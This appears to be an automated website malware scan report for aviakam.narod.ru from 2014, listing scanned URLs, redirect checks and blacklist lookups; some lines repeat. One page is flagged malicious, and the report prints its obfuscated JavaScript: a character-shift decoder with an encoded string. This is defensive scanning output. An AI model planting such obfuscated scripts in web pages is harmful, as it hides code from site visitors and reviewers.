Scanned pages/files
Request | Server response | Status |
http://aviakam.narod.ru/ | 200 OK Content-Length: 15613 Content-Type: text/html | clean |
http://aviakam.narod.ru/abnl/?adsdata=JMsqBrLO9BP3EDvBN8Dx9wNWeYFD!lpIFIR1DMOlauy3zJuKLgycscdOh4;7uEC;gOi^0Pzj90Ha91SV5!J6LDfkY;fy3S;c3UfRuUJ;04hZOuYVc1GT;JPRe0xE73g9KUCmzCJ9xBOXhzPWCm^FRURn9Rth1OYkTaDc;rJvSskwrD1l8tmtVe0bq8!dO7KmbZkcXI132PD04J;vDpWd3yNC;NlNMVNXspUVPG6HJMhiFbyDVuRJYwBVNyI0vmavr8PD^e7uLeDf2e7kQBBWfJBSQVUdN8T;4DuLrX40YulX9X6ZRTL;qWxUwrgLRIAAb4fm2gKq2b9LTtidRWiNlsbTaDmq8Nz!IvhdbUfPLcLrpf801dDK08Tnyg;VsvaTVb;KhjC7Rps^szhLg7Bwl7co | 200 OK Content-Length: 3321 Content-Type: application/javascript | clean |
http://s202.ucoz.net/src/jquery-1.7.2.js | 200 OK Content-Length: 94840 Content-Type: text/javascript | clean |
http://s202.ucoz.net/src/ulightbox/ulightbox.js | 200 OK Content-Length: 22097 Content-Type: text/javascript | clean |
http://s202.ucoz.net/src/uwnd.js?2 | 200 OK Content-Length: 228554 Content-Type: text/javascript | clean |
http://aviakam.narod.ru/register | 200 OK Content-Length: 23356 Content-Type: text/html | clean |
http://aviakam.narod.ru/abnl/?adsdata=6DGR5CXD2f;yuCIQYtZMeJeg5tFZAJZdRC6BYbyzPTpJIizE1ffAD2bCQVPxyOWf938AS29y9C8yXYr2Y8zJ5YVvhIblm15QDsTa8tKVOFz0qdOI!yipWK^z0U1qz8AnPcm79j6pik1emeh^ | 200 OK Content-Length: 2725 Content-Type: application/javascript | clean |
http://aviakam.narod.ru/gb | 200 OK Content-Length: 31218 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _y8M=''; function _dS(s){ var i;var r=""; var l=s.length-1; var k=s.substr(l,1); for (i=0;i<l;i++){ c=s.charCodeAt(i)-k; if(c<32){ c=127-(32-c);} r+=String.fromCharCode(c); } return r;} _y8M=_dS('Cpuw|{\'{!wlD)opkklu)\'uhtlD)zvz)\'}hs|lD):877<<@:99)\'6E7'); Antivirus reports:
| ||
http://aviakam.narod.ru/abnl/?adsdata=Xg0lGMhqnDjJz4r682nV!OlR5iKJnNI1tkqzO3RreQSwm2454TjemlQIv6SbWyYSyhMYz3xzT14IMHHnSHIN!GjINDp^Le7kXmryM0vbIaSAR0JUZIGlJsxPqDcbmAGfkt!j9mYsQQqzr;oo | 200 OK Content-Length: 2721 Content-Type: application/javascript | clean |
http://aviakam.narod.ru/test404page.js | 404 Not Found Content-Length: 6869 Content-Type: text/html | clean |
http://aviakam.narod.ru/news/rss/ | 200 OK Content-Length: 354 Content-Type: text/xml | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: aviakam.narod.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 09 Dec 2014 09:37:21 GMT
Server: uServ/3.2.2
Content-Length: 15613
Content-Type: text/html; charset=UTF-8
...15613 bytes of data.
GET / HTTP/1.1
Host: aviakam.narod.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 09 Dec 2014 09:37:21 GMT
Server: uServ/3.2.2
Content-Length: 15613
Content-Type: text/html; charset=UTF-8
...15613 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: aviakam.narod.ru
Referer: http://www.google.com/search?q=aviakam.narod.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: aviakam.narod.ru
Referer: http://www.google.com/search?q=aviakam.narod.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=aviakam.narod.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://aviakam.narod.ru/
Result: aviakam.narod.ru is not infected or malware details are not published yet.
Result: aviakam.narod.ru is not infected or malware details are not published yet.